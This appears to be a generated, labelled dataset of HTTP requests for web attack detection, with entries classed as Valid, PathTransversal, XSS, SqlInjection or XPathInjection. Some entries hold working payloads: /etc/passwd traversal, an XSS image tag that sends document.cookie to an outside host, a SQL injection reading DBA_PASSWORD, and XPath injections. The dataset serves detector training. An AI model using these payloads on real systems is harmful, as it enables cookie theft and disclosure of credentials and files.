Pragma: Bhs=Mm
Proxy-Authorization: Basic dG8xbnJJbDprdHJo
Authorization: Basic cG9vYTpvbmtu
Range: -1,-97620,-0636
Referer: /rteNw3f.jsp
TE: trailers,trailers,trailers
Trailer: Warning
User-Agent: Mozilla/0.4 (Machintosh; U; PPC 3.2; dO-h9; rv:0.9.8) Gecko/31979406
UA-CPU: StrongARM
UA-Disp: 8350,6514,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 2503x5889
Via: 2.0 101.194.173.200
Transfer-Encoding: identity
Upgrade: skeho/2.7
Warning: 330 www.en4chatr.gif "gimro07nicd5tc7s" 
X-Forwarded-For: 145.88.219.204
X-Serial-Number: 5154162838641141297
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32255
Start - Id: 46387
class: PathTransversal
GET /ebhsltat7deen/to5/Joz.png?lisaalw=%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd HTTP/1.1
Host: 63.229.174.9
Connection: r8aacwm
Accept: image/*
Accept-Charset: x-mac-chinesetrad;q=0.3, gb2312;q=0.7, big5, x-mac-turkish;q=0.5, cp-932;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: min-fresh=682
Client-ip: 230.204.6.13
Cookie: Hsomh6btjsutS=f3B;tl5spfhalhenase=4window.openEa;nrzn=etalhrqlrmtm;as_pOYB6vincludeM=uk5PwE6NjrR;egegoenn=0ddoqrsf;X8lchildfounionJj=childnp
Cookie2: $Version="1"
Date: Sun, 02 Nov 08 07:44:04 CET
ETag: "5SK-T2XgyVaARjP62O"
Expect: 100-continue
From: ladasd@didtoeUsr.uk
If-Modified-Since: Tue, 25 Nov 08 16:58:50 UTC
If-Unmodified-Since: Sun, 22 Aug 04 09:23:32 UTC
If-Match: "-5G43@R4xEAX8Ap"
If-None-Match: "ZEvCD@QUg8SiH@BPGeQ"
If-Range: Wed, 21 Jan 09 24:46:36 GMT
Max-Forwards: 5
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: NTLM bXQ0aTZtczlyc2llb3dEc25rcTFoZHNoaUVnUHRvYW5kRWV0
Authorization: Digest qop=la8es
Range: 1-64988,874604-47420,9842-4
Referer: /nNsZfgeh/eevn/93eit.cfm
TE: deflate,chunked
Trailer: Cache-Control
User-Agent: Mozilla/0.2 (Windows; U; Win 9x 9.3; ns-ke; rv:4.6.9) Gecko/17851884
UA-CPU: MIPS
UA-Disp: 4968,8587,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 3216x516
Via: 3.5 176.191.74.65:2838, uod/4.7 217.215.74.199
Transfer-Encoding: deflate
Upgrade: nri/5.0, rree/0.5, msno/4.0
Warning: 191 www.ts61.gif "suticae" 
X-Forwarded-For: 241.79.66.180
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46387
Start - Id: 18423
class: Valid
GET /ey@Q9VWWLk4Cb_ABWA/ecmEeefvMonsbawpee/cY/ns5FS6m/u2unWNzE5xOmYd1X.gif?zstylece.for4hQrcp2=rshqqonifpN HTTP/1.0
Host: www.Nytwrtc.biz
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-cache
Client-ip: 100.171.255.92
Cookie: ttttReeaz=2686;oeaoheitiev1dln=chttpzy9;5oEtendeeH=omp\elITsih;adeewbner=845971
Cookie2: $Version="2"
Date: Fri, 11 Apr 08 01:16:32 GMT
ETag: W/"Kf4iJ9_QVMhS5s.xEOn6"
Expect: 100-continue
From: iorhw@fhlRqaapa.cz
If-Modified-Since: Sat, 04 Jul 09 22:40:17 CET
If-Unmodified-Since: Sun, 05 Nov 06 15:59:22 GMT
If-Match: *
If-None-Match: "ps.R3vRgTle0Oj6ZoQ8m"
If-Range: Sun, 17 Apr 05 21:08:55 CET
Max-Forwards: 00
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: NTLM cjNtZWFMb1Ntc2J5cmVxbkRkb3lwUkVlZXJydDV0Ym5kb3I2SHR1b2lld2Vv
Authorization: l6w4 1a7tmnE=shottb
Range: 039-,2756-53,000-768
Referer: /itsod/rnwga/eiiuvntu/cuee/oz7hf.pdf
TE: chunked;q=0.5
Trailer: Transfer-Encoding
User-Agent: r4CFmdjbO http://www.eo1ocd.ch
UA-CPU: MIPS
UA-Disp: 9580,4552,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 4354x029
Via: as5mHd/4.2 www.rqettt.gif, 2.0 www.n3eh.jpg
Transfer-Encoding: k7ggw; pcljdeed=enyee3
Upgrade: fr6/9.1, a7d/9.3, ieeyad/2.3, bel/9.8, 1ryi/9.2
Warning: 667 www.dfn3lro.gif "uson3n" 
X-Forwarded-For: 157.164.79.230
X-Serial-Number: 876748
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18423
Start - Id: 47932
class: XSS
GET /eorklt5/pzprfPOle0cpT6sf02/erdolsiisues.jpg?4Squ9=E9grrt%2Fdoee&Anrh9lYVtvhtaY=3&Wxp_TVIgQ=DaJ%25ufilbgsound&0s_D=%3Cimg+++++src++%3D++++%22+++++livescript%3A%5Bdocument.location.replace+++%28%27http%3A%2F%2Fwww.senier.com%2Fcgi-bin%2Ftiroinsi.cgi%27%2Bdocument.cookie%29%3B%5D+++++%22++%3E&4t1uN5=21718036&gtatli9pt4sytA=269&ed5cy4Saeie=878591&ettzlhwhoRhq=itXobjectOlbopasswdg&ut=01128263&I5qI4LnNa=tTbJ HTTP/1.1
Host: www.trd1tecooA.cz:80
Connection: close
Accept: */*
Accept-Charset: iso-8859-2
Accept-Encoding: *
Accept-Language: 8kost-at
Cache-Control: no-cache
Client-ip: 99.239.86.40
Cookie: oek2jwtetpxq=oipwau;yiair1=e;F4yX=1;tmqqdeittreteea=ep)i;ceemocacd5Dzuaq=vcps dwinnta5 /jbpe?u9ej;evu1C@Gz5telnet2= ostyle1
Cookie2: $Version="613"
Date: Tue, 27 Sep 05 19:02:03 CET
ETag: "ftjXL.qa9aDa_vAZ2I5K"
Expect: on3be5=iadbe;seabhe=eetaKcek
From: T5cc@hrqtf.uk
If-Modified-Since: Mon, 04 May 09 08:44:10 UTC
If-Unmodified-Since: Mon, 17 Nov 08 21:10:45 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 07 Aug 07 01:36:24 UTC
Max-Forwards: 5120
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: xm5Eoo cesOKwc=keom4
Authorization: Basic b3RpdGVndDpjbWtk
Range: -6
Referer: /iOX7noaI/A7ndc.asmx
TE: trailers,gzip;q=0.8
Trailer: Max-Forwards
User-Agent: Mozilla/2.7 (Windows; U; WinNT 1.0; 6h-ha; rv:6.8.3) Gecko/10453497
UA-CPU: Sparc
UA-Disp: 216,2039,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 229x467
Via: 9.9 217.215.191.236:77772, 21dee/5.3 www.mhaqwte.jpeg
Transfer-Encoding: deflate
Upgrade: rmhmkL/0.0, a6ssth/8.0, pto/4.4, edcoWe/0.0
Warning: 074 www.lhduar.css "seste7nmh6" "Tue, 21 Sep 04 11:27:26 UTC"
X-Forwarded-For: 108.243.93.109
X-Serial-Number: 03181480810
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47932
Start - Id: 6187
class: Valid
POST /.Wo_/ukPR0qL24.2IPxh/hMU9zPcMPTzAd3kGXTvf/En7ent0ehghs4dvclorE/iVkpe/cHyibh.asmx? HTTP/1.1
Content-Length: 278
Content-Language: iaaDacue,iptule,iblRlr4n
Content-Encoding: gzip
Content-Location: http://asensre.it/eaeAzsrr.cfm
Content-MD5: ZGtzZW5jZWdvdHViaWFUaA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 14 Jul 04 04:17:21 GMT
Last-Modified: Sun, 07 Dec 08 07:01:11 CET
Host: www.hrcpo.uk
Connection: rfrtaet
Accept: application/rtf, audio/basic, text/plain
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.3
Cache-Control: evdtsC='ah'
Client-ip: 230.115.21.226
Cookie: 8Tfrom6script= lhut=/e<ye\p&;agmhpQaaaWiw2=0214386496;Tp=8$binqiIik;td=10;wuai4toL2QrE=adcearOe
Cookie2: $Version="7"
Date: Wed, 14 Jun 06 06:38:46 CET
ETag: "1fUuI-UphOGidG.5n"
Expect: 100-continue
From: e5nuLmf@tfebzmq.ch
If-Modified-Since: Fri, 23 Mar 07 20:55:20 GMT
If-Unmodified-Since: Mon, 16 Nov 09 17:17:33 CET
If-Match: "NyY.dzVhcWCkLld"
If-None-Match: "0BtY6AIJrGX31HWF92k"
If-Range: "17.LAVQMf5_VuvIf"
Max-Forwards: 6
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: scna hsfne=kittdaRt
Authorization: NTLM dDNoYW5tbnhhZUFpdXJycGdkcHl0ZDdlYWFnZmEzeWVhaWl1TA==
Range: 191-,663-
Referer: http://www.a9jcs.org/vl4neeq/rxirl.bin
TE: deflate;q=0.6,deflate
Trailer: Via
User-Agent: 769ateaiaeebfs
UA-CPU: PowerPC
UA-Disp: 470,351,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 230x8850
Via: 6.6 www.hrjnnr2.css
Transfer-Encoding: deflate
Upgrade: rdo/9.5, reg/2.6, padioo/6.0, dtneie/9.6
Warning: 202 111.3.31.14 "p90b64tvti4ta8slh" 
X-Forwarded-For: 147.71.226.116
X-Serial-Number: 1402347100773989
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

hnnsue4etaac0e=7Mnf3cYyWiWF&aeiLe7en=B=o41fm&a4torstNhbYn=0&l6ihn=85010&oTOs=9168&znz5ldundiyahcr=cGeReexetq&tlIsirsro=1&taiv06eo4iyca6r=e(~ntbFlte-cattNlqieTs&teZbreyehs=6h&upaeNt3bti=ee9nt oopene&ezbx&ocTeehv1rGLfan=h&rtscmerbt=du%s hfgc+xtdrcp&3m4bKUHehttp=594816

End - Id: 6187
Start - Id: 7882
class: Valid
PUT /t1m1kjJ9/t6mrieo9hov5tKeAi/.6Taccess_log@ZIxscriptdq/ndP.png? HTTP/1.0
Content-Length: 28
Content-Language: athitepy,i
Content-Encoding: deflate
Content-Location: /nsae/ieAwkcaf/cngruRmo.php4
Content-MD5: aGFqZHNSc3RvaTY3YUVyZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 12 Feb 05 22:59:27 GMT
Last-Modified: Tue, 12 Jul 05 20:37:19 GMT
Host: 69.124.209.165
Connection: tmroe
Accept: */*;q=0.1
Accept-Charset: iso-8859-2
Accept-Encoding: gzip, compress, deflate, compress, identity
Accept-Language: Cn7wqani-ossNu;q=0.8, aetmne-d8
Cache-Control: min-fresh=98
Client-ip: 217.1.10.243
Cookie: _EEbF19= ty:W;S2=sccQb-;itl6amEeh=9323818
Cookie2: $Version="921"
Date: Wed, 24 Sep 08 12:07:50 CET
ETag: "bnz4bYpevqr5Fkz"
Expect: maalns
From: aeb9sc@newen.be
If-Modified-Since: Wed, 17 May 06 12:35:51 CET
If-Unmodified-Since: Tue, 10 Feb 09 02:25:48 GMT
If-Match: "0ZBMasrvQLKI@k7t"
If-None-Match: "R2VKtr1VZ.Gwq92q"
If-Range: *
Max-Forwards: 63
MIME-Version: 0.4
Pragma: 5dJ=othkD7v
Proxy-Authorization: Basic c2JjYnQ6N3NscHRpcA==
Authorization: Digest username="buseh"
Range: 463-,891304-,4-5
Referer: http://eoa8e.com/osewbd/Hcefic/yuee7sbd/llgpmr1.pdf
TE: trailers,deflate;q=0.8,gzip;q=0.2
Trailer: Cache-Control
User-Agent: rtosi8vsejTaaotne
UA-CPU: Sparc
UA-Disp: 9422,2675,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 027x4135
Via: 0.4 www.eetoi.jpg, 7.7 www.eo4ner.png:0
Transfer-Encoding: eEslw; saeiuynh=n7ca
Upgrade: zo0jhs/9.3, IJs3au/5.6, dAmeer/2.8
Warning: 457 58.248.149.253 "ghot6raooeReo" 
X-Forwarded-For: 176.35.134.95
X-Serial-Number: 77243
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

21xrl=v.VU6&V8iTonIe-=aI-Oot

End - Id: 7882
Start - Id: 48823
class: XPathInjection
GET /Yy.ThJZWkQ-Cc/RoxrdaiaIen/.yzFdrop.MtXbED/ra0_GP6/vate0e/hwAe6r.mspx?sleddmxdec1t=sRawherets&childL4__gdropservices9=9&ikeElqoEolaaah=ttet3RCf22ee1t3&isdn5tl3lsrlsf=t-3dZU&zw_jrupdateWKobject0y=753393&tvDrtsent9=nBfwgetcuiaedsM%5D&atIemb=g+ote&hssgYdt7r=s2IplURptbyis&yg9=R%5C&O@DJI=6&rIorhQXMN=maaebptooo5enw&alopcre=6530790817&Hhttps0V0FV=20523&N7ghSlnlnahci=efrf0u&Mc1NytmpEij=03+++or+++1%3C+++++t%2Fn%2Fae%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D84%5D+or++77%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27 HTTP/1.1
Host: www.auybte.biz
Connection: close
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: o-t, OltgrYn-nw1st;q=0.1, nse-e, 6rlgSsT-pia, Nrnoeeo-sh4s
Cache-Control: no-cache
Client-ip: 166.142.219.107
Cookie: elzdbakei=096;YWlinkWuF8g.ws=dxtermvoasystemerTkea =o
Cookie2: $Version="4"
Date: Tue, 04 Oct 05 17:54:11 UTC
ETag: W/"HxRplA_cWdZdDiPv"
Expect: 100-continue
From: 18kll@eaes.it
If-Modified-Since: Wed, 01 Nov 06 21:58:03 GMT
If-Unmodified-Since: Mon, 23 Nov 09 08:01:33 GMT
If-Match: "u8D4cxaE9W2nrt0eDye"
If-None-Match: *
If-Range: *
Max-Forwards: 8789
MIME-Version: 7.6
Pragma: Aptq='dF'
Proxy-Authorization: tCjw ehrbwm=shqlhtz
Authorization: Digest qop=auth-int
Range: 5920-3
Referer: http://syoraq.ch/liusinl/ustuc8/m0eoeow/cKilb.php3
TE: trailers,chunked;q=0.7,chunked
Trailer: If-Match
User-Agent: Mozilla/8.6 (Machintosh; U; PPC 3.8; a7-ss; rv:5.4.9) Gecko/91526509
UA-CPU: MIPS
UA-Disp: 8370,749,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 610x7320
Via: 2.5 www.t3hros.css, 9.6 www.t3wapDt.htm, FTP/8.4 www.einrn0a.html
Transfer-Encoding: deflate
Upgrade: ej6ash/0.0, c8tth/2.4, aem/9.4, atomei/2.3, cwtgw/0.9
Warning: 774 219.42.40.204 "UooscatlhuieAeb" 
X-Forwarded-For: 30.210.172.155
X-Serial-Number: 6969445752998
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 48823
Start - Id: 42258
class: SqlInjection
GET /eteie4lvrbA.shtml?7st5taiaoBtnb=6netcat2e&owhenkJb=nnhAy&bnSupeenrlw9dae=e-AgHp&uhfa=albinx%25+&JmmFWrD5=%27union++select+++PASSWORD+++from++DBA_PASSWORD%3B--&6f5on=hVn9RquThW&MoSte0hyii7=ho24&g4s=kksido HTTP/1.0
Host: www.siqdaOr.it
Connection: migof
Accept: */*;q=0.3
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 164.216.181.230
Cookie: intf=am.i_vv;aoinlyr4=55;brh=n\3~;tgi=540155;nslr=t20D.oF
Cookie2: $Version="528"
Date: Mon, 09 Apr 07 12:11:44 GMT
ETag: W/"3EUs5XR7C38VJfgd-18V"
Expect: 100-continue
From: cuyents@tqutcrxrn.be
If-Modified-Since: Tue, 08 Nov 05 22:29:51 UTC
If-Unmodified-Since: Tue, 29 Jun 04 11:26:12 GMT
If-Match: "hJY--ujt5vlPCU2RZ_"
If-None-Match: "7sQpvDzf-HF7pA5dBkn"
If-Range: *
Max-Forwards: 2
MIME-Version: 9.4
Pragma: ds=si4
Proxy-Authorization: NTLM aWd1eTNuZHNvSTdmd3VkeFJzcHFodHV0dHlmRGVsNm8=
Authorization: NTLM ZGxyY2F3cml0dmFkeHhpZzN2YWlpb3hkM2JvcmR0aW5hcnU=
Range: 041331-40746,8485-207,-9
Referer: /stO31/o3rinc1d/lrDgb/Ayor/0jeE.jsp
TE: trailers,gzip,trailers
Trailer: Accept-Language
User-Agent: riAaur
UA-CPU: Sparc
UA-Disp: 8058,0040,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 4325x083
Via: FTP/2.9 www.e0td.html, yjae/3.0 www.oyr9.html, 7.3 www.3mzIu.htm
Transfer-Encoding: deflate
Upgrade: gtaeas/6.8, ae9e/5.6, rdaei/1.7, ilto/8.7, n5w/5.4
Warning: 603 www.noaae9et.htm "gipssw9ncjfTy" "Thu, 20 Aug 09 20:05:59 GMT"
X-Forwarded-For: 42.114.104.151
X-Serial-Number: 29366252
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42258
Start - Id: 46303
class: PathTransversal
GET /bxD1llNmSgw/eYyNz/sQKZWRCv0eOkfVHlh/eJoi6_F5J4/srS/o9Gexdliwta9/sEsluynn/eDi2bqett6vasdn.aspx?BWBiQjacceptg-=9464974&casi=5156112&IspreIc1oetta=093629&2eoE=n7Lorgrdbeepvj&nsTdLis3niii=tecfromefnullt0mtbmwt&wu7xmls=taL%273owp-&7re4Oijsu=7&lruraRpOrt9h=2&b6eKoS5bnsni=hHw%40obygvbT&5-7Pl3T=rsoia0rsstftotIHas&bo=%2Fetc%2Fpasswd&iNraiWei=7&tsbyyP=sNshoei&cohm=rl&tnsm4Aypskushr=5819158126 HTTP/1.0
Host: www.ite9.fr:80
Connection: keep-alive
Accept: application/x-tar, audio/*
Accept-Charset: windows-1257, utf-8, isiri-3342;q=0.5
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: no-cache
Client-ip: 206.214.212.144
Cookie: 8RD@p_@=3107504;weplj=un n\n;sperlLshutdown=eqxp_naO)~ER6oalinktranrq;jentban=2088628350;orA1eyusSpOmegN=2H.qaJXUcJk
Cookie2: $Version="73"
Date: Sat, 03 May 08 10:55:16 CET
ETag: W/"l1XkmFGdW1ggoyh14oL"
Expect: uanyb
From: twei@aedq.de
If-Modified-Since: Wed, 12 Oct 05 13:56:34 CET
If-Unmodified-Since: Thu, 07 Oct 04 13:55:09 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 12 Jul 09 10:55:43 CET
Max-Forwards: 94
MIME-Version: 8.6
Pragma: lqh='etnnd7s'
Proxy-Authorization: Basic aGlFYTp3YXR0T24=
Authorization: nrns iewmrE=p1crees
Range: 5-,07-2
Referer: http://www.eonsoaP.gov/4tticiyk/ateaet/4gdsfeh/3onlmmeA/Aaeaac.pdf
TE: gzip;q=0.9,trailers,gzip;q=0.3
Trailer: If-Unmodified-Since
User-Agent: Mozilla/3.7 (Windows; U; WinNT 9.0; cc-uj; rv:1.9.4) Gecko/02841262
UA-CPU: Sparc
UA-Disp: 542,0115,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 1380x824
Via: 3.7 www.yilftr.gif:2112, ait/3.7 103.159.168.69
Transfer-Encoding: identity
Upgrade: WuhsN/7.7, 8tnLT/4.2
Warning: 165 170.166.64.203:01144 "oSte0enOhlsosme9awi" 
X-Forwarded-For: 207.118.108.52
X-Serial-Number: 0260257
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46303
Start - Id: 28913
class: Valid
GET /e7ql0Djw60a/rruthuOkadxe52c/rwNFGHaCF4EyyPjtF/heleeguaEp.shtml?aHnij=2068740&bepecltUb=e&LIKy2divXZMEY=b4mnitaalupa&4Dhai=4n0sqeb&is=sepslikes&ch1Nnhio=i&cce5FREb=8137&Csuhdhtcm4oe=re%7Enes4anwa&SmnOuc=5961&BUcTiframenetcatmog-=16na-eet4opt&nassao=bZne9stvSg8wor&oDmpeedtreuaOt=ih+f&resBgatdm=binlrLtdditetiaie&hoSws=rl+&ngWes9c=wGv4 HTTP/1.0
Host: www.presqikoi.gov
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: identity, deflate, gzip;q=0.2, compress
Accept-Language: to-weewsh, vmemre-tte;q=0.3, gTvhuy-sea
Cache-Control: min-fresh=03645
Client-ip: 189.113.60.102
Cookie: wq2L2F=7;9dnl@K-3=he7rdrIswefhtairTt;mDSuchoo=aytesies;IuWK_=odshhtl4niI2ahhe1e;a0ined=n@uaiex
Cookie2: $Version="054"
Date: Sat, 20 Feb 10 10:17:48 GMT
ETag: W/"FKuLIFjh_xYHsqxw"
Expect: 100-continue
From: em2nped@eail.de
If-Modified-Since: Sat, 01 Jul 06 04:15:35 UTC
If-Unmodified-Since: Mon, 28 Feb 05 04:47:46 CET
If-Match: "MYz9cdagIEaJTRT7_YTu"
If-None-Match: *
If-Range: Sat, 27 Sep 08 05:40:16 GMT
Max-Forwards: 7230
MIME-Version: 9.1
Pragma: scOf='tC'
Proxy-Authorization: Basic aDl1YW9GOTphbm5oZQ==
Authorization: Digest opaque="5ols"
Range: 492-,-067,215329-8229
Referer: /essoya/lw4uEls.doc
TE: gzip,trailers,deflate
Trailer: If-Unmodified-Since
User-Agent: laOPoge/4.0.6.0.7
UA-CPU: StrongARM
UA-Disp: 219,0393,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 4214x6958
Via: HTTP/8.4 www.stbve6nn.jpg:88
Transfer-Encoding: identity
Upgrade: gtFdng/9.2, tlogad/2.0, 0nanTR/9.4, nu1d/8.3
Warning: 619 160.163.158.156 "ntaeemp7dAprv6" 
X-Forwarded-For: 108.24.111.61
X-Serial-Number: 4133682407405802626
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28913
Start - Id: 49338
class: XPathInjection
GET /e3/eO2OaH/rQkP-jxSpX-3/sGz/a7C/ejttUC9dehaiej.nsf?tserti6n=udjeos&sTaaoeoLygae=54558779&replaceAul=921432&nIe1a7idrsmteox=on%27++or+r%2FrRi8mc%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D429%5D+or+%27rDra7etr%27+%3D%27&4nullimtmpTR.=0&@7XdOCsZsJ=hGxD%40PJ-15xq&tMeZwdnb=execroai%28nR&KRXyWLQ=a+tzhtacces&net=eJkDmF2i&tlgs=p7n&vi=0048710385&mzr6Uanssafu=t9 HTTP/1.0
Host: www.hlso7aks6.com
Connection: de3ws
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 22.165.123.172
Cookie: 3jrr=netcatNanp=m9o;annPheeOgrtaS=0;I2motmed0whxe=2978958476;RAnDz=ro;4gQt=iEdrhc;v8tL_9hPTOb0=wotaO
Cookie2: $Version="889"
Date: Thu, 15 May 08 24:21:04 UTC
ETag: "iBFJ9mYzhquyr_gUZQz"
Expect: 100-continue
From: 5sny@toesr.uk
If-Modified-Since: Fri, 04 Aug 06 07:08:01 GMT
If-Unmodified-Since: Sun, 10 Jul 05 04:00:03 UTC
If-Match: "wkIHvyXQR61ssp4j"
If-None-Match: "2sXxYV.Ic6rbmYH_"
If-Range: Tue, 03 May 05 02:07:54 UTC
Max-Forwards: 017
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: NTLM dGVlbW9wNWVvd21temR0cmFOaG5lSVNUbGx0bU9tb2hlbA==
Authorization: Basic c29pZTplbHRxcmVN
Range: -8
Referer: /eige/reesreOx.msf
TE: trailers,gzip;q=0.9,trailers
Trailer: From
User-Agent: av6sAqot3 http://www.olrL.st
UA-CPU: StrongARM
UA-Disp: 396,9946,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 953x2070
Via: 6.3 www.engtnhd.jpeg
Transfer-Encoding: identity
Upgrade: vJltet/0.9, dda/3.3, iieen/3.3, aNr4k2/1.4, h82fxs/8.6
Warning: 257 184.190.147.157 "nuwa" "Wed, 25 Aug 04 17:11:36 GMT"
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 27114318414424
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49338
Start - Id: 21502
class: Valid
GET /csayTnsaDtiiwodnrse.gif?4XJVIKvvhttps9=8&oEeGuhylrlo=otZYC43-Z13&B2f1c1Vwget9@8S=hExERHWwp&yuiotec=osqrjiurf&to=sanvgaye2aA&Mo=4726672&e2y9V.bmprocessing-instruction=5r&elNoAonn=ajnocsovuddtCTrmail6i%3Bo&olkeai=gkSj744&vw9sevadnxdej=aos2 HTTP/1.0
Host: 163.160.175.129
Connection: close
Accept: */*;q=0.6
Accept-Charset: windows-1251;q=0.8, iso-8859-7;q=0.3, x-mac-arabic, windows-1257
Accept-Encoding: 
Accept-Language: tmeo-Cs, dnvlana-gotAp
Cache-Control: no-store
Client-ip: 129.114.252.94
Cookie: dutfwnyoaooss=rzmidiwsvlu ti 
Cookie2: $Version="3"
Date: Fri, 02 Dec 05 07:22:34 UTC
ETag: W/"wm4JuCGS8MMcCC.Q"
Expect: 100-continue
From: 8whhees@Oeeq.net
If-Modified-Since: Mon, 03 Sep 07 14:27:28 UTC
If-Unmodified-Since: Sun, 14 Mar 04 14:16:50 CET
If-Match: "eZ7ygZSQSZnMtjg"
If-None-Match: *
If-Range: "-sYKR7A9EzfdHmkbWpy"
Max-Forwards: 371
MIME-Version: 4.1
Pragma: irelqa0m='v'
Proxy-Authorization: Basic YW1yYjpydnVu
Authorization: NTLM dHR0OHJzbnNsYmxyaWxFTGxobjBpaG0yZTNjc210b2h0ZkM=
Range: 8137-,-4
Referer: http://www.rouy3.cz/eesoLiae/en7sO.sh
TE: deflate,chunked
Trailer: If-Unmodified-Since
User-Agent: unauo (seUQgf; e6RcFj)
UA-CPU: Sparc
UA-Disp: 130,178,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 7753x3387
Via: 7.8 www.sezlg.jpeg
Transfer-Encoding: do8hss; sntEh=0jlytaam
Upgrade: plddhm/2.0, afiewd/8.6, tst/4.7
Warning: 278 www.noeiu.jpg "ddshudlt" 
X-Forwarded-For: 9.183.95.174
X-Serial-Number: 15490998338905562
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21502
Start - Id: 1870
class: Valid
GET /cirsa/qKCBc2IK0dRM/qawiTnlsaadd2zltsnet/n0/aiMOx/xUtelnet.inputnph-qv/8gwreseuvxemlYS/Ft8h7frt6Ihiohnpen.aspx?oiyh=eh&ETsrca5omofvr=and&ewlywap=auh&ieliNsexesye9e2=bz9zee7eeo+&7pcD=exml%5Cn%2Fciao%2Fhtpassekhpasswdnl&lEasiAe=sIhe&larRgnDE=t75&fuiheiPto=loTlpi%3B%40us8&thEiNoahuseTilg=l7haehtdost&npIvsGle=59327946&6XQxGeI=ae HTTP/1.0
Host: www.tceiahe.cz:7
Connection: close
Accept: image/*, audio/*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 188.102.222.214
Cookie: 2hHeiNzey6nttGr=ao0vAft:sz4gwheref;g3Ro=2anvi;0eOi=aieasm;dnehseeiesl=2005;rui3le=aVMFV07aU;e5Tabis=030
Cookie2: $Version="278"
Date: Tue, 02 Aug 05 03:37:02 UTC
ETag: W/"3C2rID-teD7-_L1s"
Expect: 100-continue
From: eopieirR@te3gi1emy.be
If-Modified-Since: Mon, 28 Jan 08 12:38:02 GMT
If-Unmodified-Since: Mon, 20 Jul 09 18:36:05 CET
If-Match: *
If-None-Match: *
If-Range: "v4@CFehNa4p.zhYVPDtD"
Max-Forwards: 42
MIME-Version: 9.5
Pragma: no-cache
Proxy-Authorization: dot0w shDsc1da=rfcu0
Authorization: Basic dGh1dGZzVDpkcEkwU2U=
Range: -4,19022-,558645-4370
Referer: http://www.eect.be/hfuOitaa.gif
TE: deflate,trailers,trailers
Trailer: Accept
User-Agent: golei (eN7Uw1d; tmXOU0; cQ701Z; oGhy6qat; eN7b@vL)
UA-CPU: PowerPC
UA-Disp: 171,774,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 899x371
Via: HTTP/6.4 226.132.215.28:1653, 6.1 190.109.186.138
Transfer-Encoding: lnyalf; seLla94n=gavig
Upgrade: ue0/2.4, itqt5/5.4, 6Erms/1.3
Warning: 710 www.63f6T2cn.css "SbabsU" "Tue, 01 Aug 06 20:42:57 GMT"
X-Forwarded-For: 120.197.169.25
X-Serial-Number: 9825967
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1870
Start - Id: 22368
class: Valid
